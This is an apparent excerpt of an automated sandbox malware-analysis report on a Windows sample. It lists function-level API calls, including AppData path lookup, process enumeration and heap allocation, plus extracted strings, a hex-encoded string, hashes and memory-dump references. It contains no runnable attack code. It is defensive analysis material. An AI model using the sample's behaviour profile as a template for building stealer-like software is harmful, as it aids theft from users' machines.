                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: cccae4627127f37df22d89464cf7947915c2cd37e1518d00115e5465bbd62387
                              • Instruction ID: c9eaa9185fe6e6eff07efe8ff1a6256bc410cbcd4963384fc9c38dee900304c4
                              • Opcode Fuzzy Hash: cccae4627127f37df22d89464cf7947915c2cd37e1518d00115e5465bbd62387
                              • Instruction Fuzzy Hash: A741E77550479C6EDB218B24CD88FFBBFECBF45304F1444E8EA8686142E271AA45DF20
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005989C6
                                • Part of subcall function 005BA1F0: std::exception::exception.LIBCMT ref: 005BA205
                                • Part of subcall function 005BA1F0: std::exception::exception.LIBCMT ref: 005BA22B
                              • std::_Xinvalid_argument.LIBCPMT ref: 005989FD
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1B8
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1DE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: invalid string position$string too long
                              • API String ID: 2002836212-4289949731
                              • Opcode ID: e575f3de4eabf7a036f521762d310342afd0fa9ccbef7bcb947c680c5d9455ea
                              • Instruction ID: dd0430a62bae7fc53f2bd245c00b58db66197facacd7a51a48657ab6b358fd88
                              • Opcode Fuzzy Hash: e575f3de4eabf7a036f521762d310342afd0fa9ccbef7bcb947c680c5d9455ea
                              • Instruction Fuzzy Hash: 7721A6723006504BCF219A6CE840A7AFB99FBA2761B24093FF152CB681DB71DC41C3E5
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B5942
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1B8
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1DE
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B5955
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Similarity
                              • API ID: Xinvalid_argumentstd::_std::exception::exception
                              • String ID: Sec-WebSocket-Version: 13$string too long
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,005BA460,000000FF), ref: 005B3CC0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B3CC7
                              • wsprintfA.USER32 ref: 005B3CD7
                                • Part of subcall function 005B7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 005B722E
                              Strings
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              APIs
                              Strings
                              Similarity
                              • API ID: __amsg_exit$__getptdfree
                              • String ID: Xu\
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00598767
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1B8
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1DE
                              Strings
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005AE68B
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE6C0
                              • lstrcat.KERNEL32(?,00000000), ref: 005AE6CC
                              • lstrcat.KERNEL32(?,0160DC80), ref: 005AE6E5
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              APIs
                              Strings
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 005B1F5F, 005B1F75, 005B2037
                              Similarity
                              • API ID: strlen
                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005AED14
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AED43
                              • lstrcat.KERNEL32(?,00000000), ref: 005AED51
                              • lstrcat.KERNEL32(?,0160E7A8), ref: 005AED6C
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000), ref: 005B44B2
                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 005B44CD
                              • CloseHandle.KERNEL32(00000000), ref: 005B44D4
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B4507
                              Similarity
                              • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                              • String ID:
                              APIs
                              • __getptd.LIBCMT ref: 005B900D
                                • Part of subcall function 005B882F: __amsg_exit.LIBCMT ref: 005B883F
                              • __getptd.LIBCMT ref: 005B9024
                              • __amsg_exit.LIBCMT ref: 005B9032
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 005B9056
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              APIs
                              • lstrlen.KERNEL32(------,00595B1B), ref: 005B734B
                              • lstrcpy.KERNEL32(00000000), ref: 005B736F
                              • lstrcat.KERNEL32(?,------), ref: 005B7379
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcatlstrcpylstrlen
                              • String ID: ------
                              • API String ID: 3050337572-882505780
                              APIs
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591437
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591459
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A37CE
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A37F7
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A381D
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A3843
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005A7D14
                              • std::_Xinvalid_argument.LIBCPMT ref: 005A7D2F
                                • Part of subcall function 005A7DC0: std::_Xinvalid_argument.LIBCPMT ref: 005A7DD8
                                • Part of subcall function 005A7DC0: std::_Xinvalid_argument.LIBCPMT ref: 005A7DF6
                                • Part of subcall function 005A7DC0: std::_Xinvalid_argument.LIBCPMT ref: 005A7E11
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: string too long
                              • API String ID: 909987262-2556327735
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 00596EB4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00596EBB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcess
                              • String ID: @
                              • API String ID: 1357844191-2766056989
                              APIs
                                • Part of subcall function 005B784C: __mtinitlocknum.LIBCMT ref: 005B7862
                                • Part of subcall function 005B784C: __amsg_exit.LIBCMT ref: 005B786E
                              • ___addlocaleref.LIBCMT ref: 005B8786
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$xt\
                              • API String ID: 3105635775-4074808725
                              APIs
                              • std::exception::exception.LIBCMT ref: 00598B8B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception
                              • String ID: PvY$xY
                              • API String ID: 2807920213-55992228
                              APIs
                              • std::exception::exception.LIBCMT ref: 00598DAD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception
                              • String ID: PvY$P\
                              • API String ID: 2807920213-778110337
                              APIs
                                • Part of subcall function 00591510: lstrcpy.KERNEL32(00000000), ref: 0059152D
                                • Part of subcall function 00591510: lstrcpy.KERNEL32(00000000,?), ref: 0059154F
                                • Part of subcall function 00591510: lstrcpy.KERNEL32(00000000,?), ref: 00591571
                                • Part of subcall function 00591510: lstrcpy.KERNEL32(00000000,?), ref: 00591593
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591437
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591459
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                              • lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 005B1581
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B15B9
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B15F1
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B1629
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 641a1d75acadadf72974f2efaa28143cb99ddda2ee8aa2c0f15f31736cb527ae
                              • Instruction ID: dd88dadf9cc9a116273401724a13466580330dac3483aa82abeade809321460c
                              • Opcode Fuzzy Hash: 641a1d75acadadf72974f2efaa28143cb99ddda2ee8aa2c0f15f31736cb527ae
                              • Instruction Fuzzy Hash: 3921BBB4601B039BDB74DF2AC569A27BBE5BF84700F544A1CA496C7A90DB34F841CF94
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 0059152D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059154F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591571
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591593
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 9cae46b25b03696a019e65682c4abb934aa1b692824cd64c88f1c9dcef7f76aa
                              • Instruction ID: 822055149507ba7466eccaa418a5e98b41b0148ccbc1d218dcf1cea517e28d38
                              • Opcode Fuzzy Hash: 9cae46b25b03696a019e65682c4abb934aa1b692824cd64c88f1c9dcef7f76aa
                              • Instruction Fuzzy Hash: 0611DAB4A12B03ABDF249F76D45D927BBF8BF84701706452DA456C7A50EB34E8018F94